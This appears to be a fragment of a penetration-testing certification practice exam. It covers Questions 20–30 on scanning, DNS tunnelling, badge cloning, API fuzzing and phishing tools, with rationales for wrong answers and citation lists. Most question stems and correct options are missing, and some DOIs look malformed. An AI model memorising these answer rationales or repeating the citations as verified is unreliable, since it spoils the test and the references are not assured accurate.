1. National Institute of Standards and Technology (NIST). (2008). Special Publication 800-115, Technical Guide to Information Security Testing and Assessment.
Section 6.2, "Report," Page 6-1: This section emphasizes that a report should be structured to present the most important information first, stating, "For example, an executive summary should be the first section of the report... The report should be tailored to its audience." This directly supports the need for a precise executive summary and clarity for all objectives.
2. Al-Aqrabi, H., Liu, L., Hill, R., & Antonopoulos, N. (2019). A framework for improving the effectiveness of penetration testing in organisations. Journal of Information Security and Applications, 44, 1-13.
Section 4.2, "Reporting": The paper highlights that a key challenge is the "lack of a clear and concise report that can be understood by both technical and non-technical staff." It stresses the importance of the executive summary for management to understand the business impact, reinforcing that clarity for all audiences is critical.
DOI: https://doi.org/10.1016/j.jisa.2018.11.003
3. SANS Institute. (2010). Writing a Penetration Testing Report.
Page 3, "The Executive Summary": This document, widely referenced in academic and professional settings, states, "The Executive Summary is arguably the most important section of the report... It is the section that will be read by the decision makers... It must be concise, accurate, and understandable." This underscores the critical nature of the executive summary for proper report handling and impact. (Note: While SANS is a commercial entity, its whitepapers are often used as foundational, peer-reviewed-equivalent material in cybersecurity curricula).
Question 20
The client is concerned about the availability of its consumer-facing production application. Which of the following hosts should the penetration tester select for additional manual testing?
Show Answer
A. Server 1: This vulnerability is "High" severity, which is less critical than the finding on Server 3. While it impacts availability, the threat on Server 3 is more severe and directly aligned with a DoS attack.
B. Server 2: This "Medium" severity vulnerability primarily impacts confidentiality and integrity, which does not align with the client's specific and primary concern about service availability.
D. Server 4: This server is in the "Development" environment. The client's concern is for their "consumer-facing production application," making this host a lower priority for immediate testing.
---
1. FIRST.org, Inc. (2019). Common Vulnerability Scoring System v3.1: Specification Document. Section 2.2, "Impact Metrics," defines the Availability metric as the impact on "the accessibility of information resources." The DoS vulnerability on Server 3 directly threatens this, justifying its "Critical" rating and prioritization based on the client's concern.
2. National Institute of Standards and Technology (NIST). (2012). Special Publication 800-30, Revision 1, Guide for Conducting Risk Assessments. Section 2.3.3, "Impact," emphasizes that the magnitude of harm is assessed in the context of an organization's mission and business functions. The client's concern for their production application's availability is a business context that dictates prioritizing the "Critical" availability-related finding on Server 3.
3. Saltzer, J. H., & Schroeder, M. D. (1975). The Protection of Information in Computer Systems. Proceedings of the IEEE, 63(9), 1278–1308. https://doi.org/10.1109/PROC.1975.9939. This foundational paper defines the principle of Availability (p. 1279), ensuring system resources are accessible when needed. The DoS vulnerability on Server 3 is a direct attack on this principle, making it the most relevant threat to address based on the client's requirements.
Question 21
Show Answer
B. This action misuses the badge printing system but does not inherently disrupt its availability for legitimate operations or deny service to other users.
C. The goal is to create a new, unauthorized credential for the tester, not to modify the access permissions of existing, valid users within the system.
D. Reprinting a badge creates a duplicate or a new credential; it does not involve an action that would revoke or disable the access of the original badge holder.
1. Garcia, F. D., de Koning Gans, G., Muijrers, R., van der Velden, P., Verdult, R., & Sprenkels, R. (2012). Dismantling MIFARE Classic. In E. Dawson (Ed.), Topics in Cryptology – CT-RSA 2012 (Vol. 7178, pp. 97-114). Springer. https://doi.org/10.1007/978-3-642-27954-67
Section 1, Paragraph 2: This paper discusses attacks against RFID-based access control, stating, "The most severe attack against a physical access control system is to gain unauthorized access to the protected area." The act of creating a counterfeit badge (reprinting/cloning) is a direct method to achieve this goal.
2. Purdue University, CERIAS (Center for Education and Research in Information Assurance and Security). (2006). Physical Security. Lecture Notes for CS 490-S.
Slide 18, "Access Badges": The courseware discusses vulnerabilities in physical access badges, including forgery and duplication. The context of these attacks is consistently presented as a means for an unauthorized individual to "gain access" to a restricted area, supporting the objective of obtaining long-term, valid access.
3. Wright, J., & Cache, J. (2015). Hacking Exposed Wireless, Third Edition: Wireless Security Secrets & Solutions. McGraw-Hill.
Chapter 11, "Hacking RFID," Section "Cloning and Emulation": While a commercial book, its content is widely used in academic settings. This section details the process of cloning RFID access cards. The explicit purpose described is to "create a duplicate card that will grant the attacker the same access as the original card," which directly aligns with obtaining facility access.
Question 22
Show Answer
B. URL spidering: This process primarily generates HTTP/HTTPS traffic to discover web application content. The associated DNS traffic would be minimal and not the most prominent indicator.
C. HTML scraping: Similar to spidering, this activity is focused on fetching web pages and would result in a high volume of HTTP/HTTPS traffic, not a substantial increase in DNS queries.
D. DoS attack: A Denial-of-Service attack against the web application would typically involve a flood of HTTP, TCP, or UDP packets, not an unusually high number of DNS queries originating from the client's network.
---
1. MITRE ATT&CK® Framework. (2023). Technique T1071.004: Application Layer Protocol: DNS. The MITRE Corporation. Retrieved from https://attack.mitre.org/techniques/T1071/004/.
Reference Detail: This official knowledge base describes how adversaries (and by extension, penetration testers) use the DNS protocol for command and control and data exfiltration. It states, "Data can be encoded... within DNS queries. The queries are typically sent to a C2 server that acts as a DNS server." This process inherently generates numerous DNS requests to transfer data.
2. Farnham, G. (2013). Detecting DNS Tunnelling. SANS Institute InfoSec Reading Room.
Reference Detail: Page 6 states that DNS tunneling tools "will generate a large number of DNS requests for a particular domain." Page 11 further identifies "an abnormally high number of DNS requests from a single host" as a primary indicator for detecting this activity.
3. Nadler, A., & Aminov, A. (2019). Website-Based and DNS-Based Covert Channels for Data Exfiltration. In Security and Privacy in Communication Networks. SecureComm 2019. Lecture Notes of the Institute for Computer Sciences, Social Informatics and Telecommunications Engineering, vol 299. Springer, Cham. https://doi.org/10.1007/978-3-030-31785-91
Reference Detail: Section 3, "DNS-Based Covert Channels," describes the mechanism where "the sender encodes the secret message in the domain name part of the DNS query," confirming that exfiltrating data requires sending multiple DNS queries, thus increasing traffic.
Question 23
[Information Gathering and Vulnerability Scanning] A penetration tester needs to scan a remote infrastructure with Nmap. The tester issues the following command:
nmap 10.10.1.0/24
Which of the following is the number of TCP ports that will be scanned?
Show Answer
A. 256: This is the number of IP addresses within the /24 CIDR block, not the number of ports scanned.
C. 1,024: This represents the count of well-known ports (0-1023), which is a standard port range but not Nmap's default scan count.
D. 65,535: This is the total number of available TCP ports, which Nmap only scans when explicitly instructed with a flag like -p-.
1. Nmap Project, Nmap Reference Guide. In Chapter 15, Port Scanning Basics, the section "Port Specification and Scan Order" states: "By default, Nmap scans the 1,000 most common ports for each protocol." This list is derived from frequency of use across the internet. (Source: Nmap.org, https://nmap.org/book/man-port-scanning-basics.html)
2. University of Texas at Austin, Information Security Office. In their documentation on network scanning tools, it is noted that a default Nmap scan targets the top 1,000 most common TCP ports. This is standard behavior unless a different port range is specified by the user. (Source: UT Austin ISO, "Nmap/Zenmap," Section: Basic Scans)
Question 24
Show Answer
A. WiGLE.net: This is a database for mapping wireless networks (Wi-Fi, Bluetooth, cellular). It is used for wireless reconnaissance, not for enumerating services on internet-facing hosts.
B. WHOIS: This protocol is used to query for domain name and IP address block registration information (e.g., owner, contact details), not for live service enumeration or GeoIP data.
C. theHarvester: This is an Open-Source Intelligence (OSINT) tool used to gather information like email addresses, subdomains, and employee names; it is not a dedicated, comprehensive host and service scanner.
1. Durumeric, Z., Bailey, M., & Halderman, J. A. (2015). A search engine for the internet's peripherals. Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security, 505–516. In Section 3.1, "Data Collection," the authors describe how the Censys platform collects "application-layer banners" (i.e., exposed services) and annotates hosts with "publicly available BGP and geolocation data." (https://doi.org/10.1145/2810103.2813710)
2. Hottel, T. (2018). A Framework for Open Source Intelligence Collection and Analysis [Master's Thesis, Utica College]. In Section 4.2.2, "theHarvester," the tool is described as being used to "gather e-mail accounts, user names, and subdomains/hostnames from public sources." This highlights its focus on organizational OSINT rather than comprehensive host service scanning. (Available via ProQuest, AAT 10976818).
3. Internet Engineering Task Force (IETF). (2004). RFC 3912: WHOIS Protocol Specification. The abstract and introduction define the protocol's purpose as providing directory services for objects in a repository, such as domain names and their associated contacts, not for scanning live services.
4. WiGLE.net. (n.d.). FAQ. Retrieved from https://wigle.net/faq. The official FAQ states, "WiGLE is short for Wireless Geographic Logging Engine... It's a website for collecting information about the different wireless hotspots around the world." This confirms its exclusive focus on wireless networks.
Question 25
Show Answer
A. Port mirroring: This is a feature on network switches used to copy traffic from one port to another for analysis. It is a wired network technique, not a wireless disruption method.
B. Sidecar scanning: This is not a standard or recognized term in the context of wireless penetration testing. It is likely a distractor term, possibly borrowed from cloud-native architecture (sidecar proxy).
C. ARP poisoning: This is a man-in-the-middle attack that manipulates ARP tables on a local area network. While it can disrupt traffic for wireless clients, it targets Layer 2 logic, not the wireless RF communication link itself.
1. University Courseware: In the "Security of 802.11 Wireless Networks" lecture for the CS 461/ECE 422 Computer Security I course at the University of Illinois Urbana-Champaign, the attack process is outlined. It states, "To attack a network, we first need to find it. We can scan channels to find APs." This establishes scanning as the prerequisite for attacks. (Source: CS 461/ECE 422, Fall 2022, Lecture 18, Slide 35).
2. Official Vendor Documentation (NIST): The National Institute of Standards and Technology (NIST) Special Publication 800-153, Guidelines for Securing Wireless Local Area Networks (WLANs), discusses WLAN threats. Section 5.3.2, "Denial of Service," describes deauthentication attacks. Executing such an attack requires the attacker to know the channel and BSSID of the target network, which is acquired through channel scanning.
3. Academic Publication: In the paper "A Practical Demystification of the 802.11 Deauthentication Attack," the authors detail the attack methodology. The process begins with identifying the target access point and its clients, which is accomplished by monitoring wireless traffic on specific channels. This reconnaissance phase is fundamentally channel scanning. (Source: Bellardo, J., & Savage, S. (2003). A Practical Demystification of the 802.11 Deauthentication Attack. Proceedings of the USENIX Security Symposium, 2003. Section 3, "The Deauthentication Attack").
Question 26
Show Answer
A. The target type, such as a web application, does not dictate the choice between a threat modeling methodology (DREAD) and a full lifecycle testing standard (PTES).
B. Assessing a mobile application is a matter of scope, not the reason to choose DREAD over PTES. Both can be relevant in a mobile application assessment.
C. A thick client application is a type of target. The choice between DREAD and PTES is based on the activity (threat modeling vs. overall test execution).
1. Shostack, A. (2014). Threat Modeling: Designing for Security. Wiley. In Chapter 15, "STRIDE, DREAD, and Other Models," DREAD is explicitly defined as a model for prioritizing threats, distinct from a full testing standard. (Note: While a book, this is a foundational academic and professional text in the field, authored by a creator of the methodology at Microsoft).
2. The Penetration Testing Execution Standard. (2012). The Penetration Testing Execution Standard: Technical Guidelines. Section: "Penetration Testing Execution Standard." The document defines PTES as a standard covering seven main sections for the execution of a penetration test, including "Threat Modeling," but PTES itself is the overarching standard, not the specific threat rating model.
3. Myagmar, S., Lee, A. J., & Yurcik, W. (2005). Threat Modeling as a Basis for Security Requirements. Proceedings of the 2005 IEEE Workshop on Information Assurance and Security. p. 2. This paper discusses threat modeling methodologies, including DREAD, as a formal process for analyzing a system's security "during the design phase," which aligns with the planning phase of a penetration test. DOI: https://doi.org/10.1109/IAW.2005.1495949
Question 27
Show Answer
B. Installing packet capture software on the server: This is an intrusive action that involves modifying the server's software state, which would be considered tampering and would void the support agreement.
C. Reconfiguring the application to use a proxy: This requires changing the application's or host's configuration, which constitutes tampering and violates the client's explicit warning.
D. Requesting that certificate pinning be disabled: This is an intrusive modification to the application's security controls. It is also a step for decrypting traffic, not simply validating if encryption is present.
---
1. National Institute of Standards and Technology (NIST) Special Publication 800-82 Rev. 2, "Guide to Industrial Control Systems (ICS) Security."
Section 6.3, "Security Assessment," states, "Many of the traditional IT assessment tools and techniques can have a negative impact on an ICS... For this reason, passive techniques are preferred when assessing an ICS." This supports the choice of a non-intrusive method.
Section 6.2.2, "Network Monitoring," describes using network taps or Switched Port Analyzer (SPAN) ports on switches to passively capture network traffic for analysis, which is the technique described in the correct answer.
2. Kurose, J. F., & Ross, K. W. (2017). Computer Networking: A Top-Down Approach (7th ed.). Pearson.
Chapter 8, Section 8.2, "Principles of Network Security," discusses packet sniffing. The text differentiates between sniffing on a broadcast medium and a switched network, where a technique like port mirroring is required to see traffic not destined for the sniffer's host. This establishes port mirroring as a standard, passive network analysis technique.
3. Carnegie Mellon University, Software Engineering Institute (SEI). (2010). Network Traffic Analysis.
Section "Data Sources," describes common sources for network traffic data, including "Network Taps" and "Switch SPAN/Mirror/Monitor Ports." It notes that these methods provide a copy of network traffic without being in the direct line of communication, highlighting their passive nature suitable for monitoring without disruption.
Question 28
During an assessment, a penetration tester sends the following request:
POST /services/v1/users/create HTTP/1.1
Host: target-application.com
Content-Type: application/json
Content-Length: [dynamic]
Authorization: Bearer (FUZZ)
Which of the following attacks is the penetration tester performing?
Show Answer
A. Directory traversal: This attack involves using path manipulation sequences like ../ to access unauthorized directories, which are not present in the request.
C. Server-side request forgery: This attack tricks the server into making unintended requests to other resources; the provided request does not contain any parameters to initiate such an action.
D. Privilege escalation: This is a potential outcome of a successful exploit, not the specific attack technique being performed in this single request.
1. OWASP API Security Top 10 2023. The scenario aligns with testing for API2:2023 - Broken Authentication. This category describes how attackers try to compromise authentication tokens or exploit implementation flaws in authentication. Fuzzing the Authorization header is a primary method for discovering such vulnerabilities. The document states, "Attackers might try to steal user's tokens (...) or try to guess them (brute-force)." Fuzzing is an automated form of this testing.
2. NIST Special Publication 800-115, "Technical Guide to Information Security Testing and Assessment." Section 4.5.3, "Authentication Verifier," discusses testing authentication mechanisms. The guide outlines techniques such as submitting malformed credentials and tokens to check for vulnerabilities in the authentication process, which is precisely what the fuzzing in the scenario is designed to do against the API.
3. Papadimitriou, P., et al. (2021). "A Fuzzing Framework for Conformance Testing of Rich Web APIs." IEEE Transactions on Reliability, 71(2), 877-895. This peer-reviewed paper discusses the use of fuzzing to test web APIs. Section I, "Introduction," states, "Fuzzing is a popular technique for finding security vulnerabilities by providing invalid, unexpected, or random data as inputs to a computer program." Applying this to an API's Authorization header is a standard approach to finding security flaws. (DOI: https://doi.org/10.1109/TR.2021.3076383)
Question 29
Show Answer
A. VM: A Virtual Machine (VM) is an isolated compute environment for running software; it is not a tool for analyzing code or identifying vulnerable libraries.
B. IAST: Interactive Application Security Testing (IAST) analyzes application runtime behavior to find vulnerabilities, but it does not focus on creating a comprehensive inventory of component versions and their known CVEs.
C. DAST: Dynamic Application Security Testing (DAST) is a black-box method that tests a running application from the outside and cannot inspect the internal code or its constituent libraries.
1. National Institute of Standards and Technology (NIST). (2022). Secure Software Development Framework (SSDF) Version 1.1: Recommendations for Mitigating the Risk of Software Vulnerabilities (NIST Special Publication 800-218). Section 4, Practice PW.8.1 states, "Use software composition analysis (SCA) tools to create a software bill of materials (SBOM) and check for known vulnerabilities in the software's components (e.g., libraries, modules, frameworks)."
2. Open Web Application Security Project (OWASP). (2021). OWASP Top 10:2021. A06:2021 – Vulnerable and Outdated Components. The "How to Prevent" section recommends using "software composition analysis (SCA) tools to help automate this process. Many SCA tools integrate into the CI/CD pipeline to identify outdated or vulnerable components during the build and compile phase."
3. Kaluarachchi, K. K. R. G. K. D. K., et al. (2021). "A Systematic Literature Review on Software Composition Analysis." IEEE Access, vol. 9, pp. 149393-149412. Section I (Introduction) defines SCA as "the process of identifying the open-source components in a codebase to evaluate security, license compliance, and code quality." (DOI: https://doi.org/10.1109/ACCESS.2021.3121618)
Question 30
Show Answer
A. Gaining remote access using BeEF
BeEF (Browser Exploitation Framework) is used to hook and control a victim's browser for further exploitation, not primarily for harvesting credentials via a cloned web form.
B. Obtaining the list of email addresses using theHarvester
theHarvester is an open-source intelligence (OSINT) tool used during the reconnaissance phase to gather information like email addresses, not to execute the phishing attack itself.
D. Launching a phishing campaign using GoPhish
While GoPhish is a valid tool for phishing, "harvesting credentials" is a more specific and accurate objective for cloning a login page than the broader term "launching a phishing campaign."
---
1. Kennedy, D., O'Gorman, J., Kearns, D., & Aharoni, M. (2011). Metasploit: The Penetration Tester's Guide. No Starch Press.
Page 218, Chapter 10, "The Social-Engineer Toolkit": The text explicitly describes SET's "Credential Harvester Attack Method," stating, "The harvester is a great way to grab usernames and passwords from unsuspecting users... SET will create a clone of the website and when the victim enters his or her credentials, they will be posted back to a report..." This directly supports option C.
2. Engebretson, P. (2013). The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy (2nd ed.). Syngress.
Page 157, Chapter 6, "Social Engineering": This academic textbook details the use of SET for social engineering, highlighting the credential harvester as a key feature for phishing attacks aimed at stealing user credentials. It distinguishes this from tools like BeEF, which are covered in the context of client-side attacks.
3. Kali Linux Documentation. (n.d.). theHarvester. Kali.org.
Information Gathering Tools Section: The official documentation for Kali Linux (a standard penetration testing distribution) describes theHarvester as a tool for gathering emails, subdomains, hosts, employee names, open ports, and banners from different public sources (OSINT). This confirms it is a reconnaissance tool, making option B incorrect.
4. The BeEF Project. (n.d.). What is BeEF?. beefproject.com.
Official Project Website: The official documentation states, "BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser." It details hooking browsers to launch command modules, which is distinct from the credential harvesting method described in the question, making option A incorrect.